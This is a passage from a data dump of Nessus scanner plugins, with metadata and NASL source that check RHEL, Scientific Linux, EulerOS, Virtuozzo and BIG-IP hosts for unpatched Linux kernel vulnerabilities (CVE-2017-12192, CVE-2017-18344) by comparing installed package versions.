flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-debuginfo-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-perf-2.6.32-754.30.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-perf-debuginfo-2.6.32-754.30.2.el6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:20:45", "description": "The remote Redhat Enterprise Linux 6 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:2430 advisory.\n\n - kernel: NULL pointer dereference due to KEYCTL_READ on negative key (CVE-2017-12192)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-06-10T00:00:00", "type": "nessus", "title": "RHEL 6 : kernel (RHSA-2020:2430)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12192"], "modified": "2023-05-25T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:rhel_els:6", "cpe:/o:redhat:rhel_eus:6.0", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "p-cpe:/a:redhat:enterprise_linux:kernel-bootwrapper", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:python-perf"], "id": "REDHAT-RHSA-2020-2430.NASL", "href": "https://www.tenable.com/plugins/nessus/137305", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2430. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137305);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/25\");\n\n script_cve_id(\"CVE-2017-12192\");\n script_bugtraq_id(101293);\n script_xref(name:\"RHSA\", value:\"2020:2430\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2020:2430)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 6 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:2430 advisory.\n\n - kernel: NULL pointer dereference due to KEYCTL_READ on negative key (CVE-2017-12192)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2017-12192\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:2430\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1493435\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12192\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(476);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_els:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-bootwrapper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\ninclude('ksplice.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '6')) audit(AUDIT_OS_NOT, 'Red Hat 6.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nif (get_one_kb_item('Host/ksplice/kernel-cves'))\n{\n rm_kb_item(name:'Host/uptrack-uname-r');\n var cve_list = make_list('CVE-2017-12192');\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for RHSA-2020:2430');\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel/power/6/6Server/ppc64/debug',\n 'content/dist/rhel/power/6/6Server/ppc64/hpn/debug',\n 'content/dist/rhel/power/6/6Server/ppc64/hpn/os',\n 'content/dist/rhel/power/6/6Server/ppc64/hpn/source/SRPMS',\n 'content/dist/rhel/power/6/6Server/ppc64/optional/debug',\n 'content/dist/rhel/power/6/6Server/ppc64/optional/os',\n 'content/dist/rhel/power/6/6Server/ppc64/optional/source/SRPMS',\n 'content/dist/rhel/power/6/6Server/ppc64/os',\n 'content/dist/rhel/power/6/6Server/ppc64/sap/debug',\n 'content/dist/rhel/power/6/6Server/ppc64/sap/os',\n 'content/dist/rhel/power/6/6Server/ppc64/sap/source/SRPMS',\n 'content/dist/rhel/power/6/6Server/ppc64/source/SRPMS',\n 'content/dist/rhel/power/6/6Server/ppc64/supplementary/debug',\n 'content/dist/rhel/power/6/6Server/ppc64/supplementary/os',\n 'content/dist/rhel/power/6/6Server/ppc64/supplementary/source/SRPMS',\n 'content/dist/rhel/system-z/6/6Server/s390x/debug',\n 'content/dist/rhel/system-z/6/6Server/s390x/optional/debug',\n 'content/dist/rhel/system-z/6/6Server/s390x/optional/os',\n 'content/dist/rhel/system-z/6/6Server/s390x/optional/source/SRPMS',\n 'content/dist/rhel/system-z/6/6Server/s390x/os',\n 'content/dist/rhel/system-z/6/6Server/s390x/sap/debug',\n 'content/dist/rhel/system-z/6/6Server/s390x/sap/os',\n 'content/dist/rhel/system-z/6/6Server/s390x/sap/source/SRPMS',\n 'content/dist/rhel/system-z/6/6Server/s390x/source/SRPMS',\n 'content/dist/rhel/system-z/6/6Server/s390x/supplementary/debug',\n 'content/dist/rhel/system-z/6/6Server/s390x/supplementary/os',\n 'content/dist/rhel/system-z/6/6Server/s390x/supplementary/source/SRPMS',\n 'content/els/rhel/system-z/6/6Server/s390x/debug',\n 'content/els/rhel/system-z/6/6Server/s390x/optional/debug',\n 'content/els/rhel/system-z/6/6Server/s390x/optional/os',\n 'content/els/rhel/system-z/6/6Server/s390x/optional/source/SRPMS',\n 'content/els/rhel/system-z/6/6Server/s390x/os',\n 'content/els/rhel/system-z/6/6Server/s390x/sap/debug',\n 'content/els/rhel/system-z/6/6Server/s390x/sap/os',\n 'content/els/rhel/system-z/6/6Server/s390x/sap/source/SRPMS',\n 'content/els/rhel/system-z/6/6Server/s390x/source/SRPMS',\n 'content/fastrack/rhel/power/6/ppc64/debug',\n 'content/fastrack/rhel/power/6/ppc64/optional/debug',\n 'content/fastrack/rhel/power/6/ppc64/optional/os',\n 'content/fastrack/rhel/power/6/ppc64/optional/source/SRPMS',\n 'content/fastrack/rhel/power/6/ppc64/os',\n 'content/fastrack/rhel/power/6/ppc64/source/SRPMS',\n 'content/fastrack/rhel/system-z/6/s390x/debug',\n 'content/fastrack/rhel/system-z/6/s390x/optional/debug',\n 'content/fastrack/rhel/system-z/6/s390x/optional/os',\n 'content/fastrack/rhel/system-z/6/s390x/optional/source/SRPMS',\n 'content/fastrack/rhel/system-z/6/s390x/os',\n 'content/fastrack/rhel/system-z/6/s390x/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'kernel-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-abi-whitelists-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-bootwrapper-2.6.32-754.30.2.el6', 'cpu':'ppc64', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-debug-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-debug-devel-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-devel-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-firmware-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-headers-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-kdump-2.6.32-754.30.2.el6', 'cpu':'s390x', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-kdump-devel-2.6.32-754.30.2.el6', 'cpu':'s390x', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'perf-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python-perf-2.6.32-754.30.2.el6', 'release':'6', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n var enterprise_linux_flag = rhel_repo_urls_has_content_dist_rhel(repo_urls:repo_relative_urls);\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp']) && !enterprise_linux_flag) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'kernel / kernel-abi-whitelists / kernel-bootwrapper / kernel-debug / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:42:23", "description": "According to the version of the kernel packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerability :\n\n - The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel doesn't properly validate the sigevent-i1/4zsigev_notify field, which leads to out-of-bounds access in the show_timer function.(CVE-2017-18344)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-11-21T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 2.5.2 : kernel (EulerOS-SA-2018-1369)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-18344"], "modified": "2021-04-08T00:00:00", "cpe": ["cpe:/o:huawei:euleros:uvp:2.5.2", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel"], "id": "EULEROS_SA-2018-1369.NASL", "href": "https://www.tenable.com/plugins/nessus/119060", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(119060);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/08\");\n\n script_cve_id(\n \"CVE-2017-18344\"\n );\n\n script_name(english:\"EulerOS Virtualization 2.5.2 : kernel (EulerOS-SA-2018-1369)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerability :\n\n - The timer_create syscall implementation in\n kernel/time/posix-timers.c in the Linux kernel doesn't\n properly validate the sigevent-i1/4zsigev_notify field,\n which leads to out-of-bounds access in the show_timer\n function.(CVE-2017-18344)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1369\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?db4e78e3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.5.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.5.2\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.5.2\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-514.44.5.10_103\",\n \"kernel-devel-3.10.0-514.44.5.10_103\",\n \"kernel-headers-3.10.0-514.44.5.10_103\",\n \"kernel-tools-3.10.0-514.44.5.10_103\",\n \"kernel-tools-libs-3.10.0-514.44.5.10_103\",\n \"kernel-tools-libs-devel-3.10.0-514.44.5.10_103\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T14:14:22", "description": "According to the version of the vzkernel package and the readykernel-patch installed, the Virtuozzo installation on the remote host is affected by the following vulnerability :\n\n - The implementation of timer_create system call in the Linux kernel before 4.14.8 doesn't properly validate the sigevent::sigev_notify field, which leads to out-of-bounds access in the show_timer function (called when /proc/$PID/timers is read). This allows userspace applications to read arbitrary kernel memory (on a kernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-08-10T00:00:00", "type": "nessus", "title": "Virtuozzo 7 : readykernel-patch (VZA-2018-052)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-18344"], "modified": "2021-03-08T00:00:00", "cpe": ["p-cpe:/a:virtuozzo:virtuozzo:readykernel", "cpe:/o:virtuozzo:virtuozzo:7"], "id": "VIRTUOZZO_VZA-2018-052.NASL", "href": "https://www.tenable.com/plugins/nessus/111642", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111642);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/08\");\n\n script_cve_id(\n \"CVE-2017-18344\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2018-052)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerability :\n\n - The implementation of timer_create system call in the\n Linux kernel before 4.14.8 doesn't properly validate\n the sigevent::sigev_notify field, which leads to\n out-of-bounds access in the show_timer function (called\n when /proc/$PID/timers is read). This allows userspace\n applications to read arbitrary kernel memory (on a\n kernel built with CONFIG_POSIX_TIMERS and\n CONFIG_CHECKPOINT_RESTORE).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2951184\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.openwall.com/lists/oss-security/2018/08/02/3\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-63.3-56.0-3.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2fbad0c6\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-862.9.1.vz7.63.3\",\n \"patch\",\"readykernel-patch-63.3-56.0-3.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_NOTE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:55", "description": "The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel before 4.14.8 doesn't properly validate the sigevent->sigev_notify field, which leads to out-of-bounds access in the show_timer function (called when /proc/$PID/timers is read). This allows userspace applications to read arbitrary kernel memory (on a kernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE).\n(CVE-2017-18344)\n\nImpact\n\nA local attacker may use this vulnerability to expose sensitive information or cause a denial of service (DoS), makingthe system unresponsive.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Linux kernel vulnerability (K07020416)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-18344"], "modified": "2022-10-28T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", 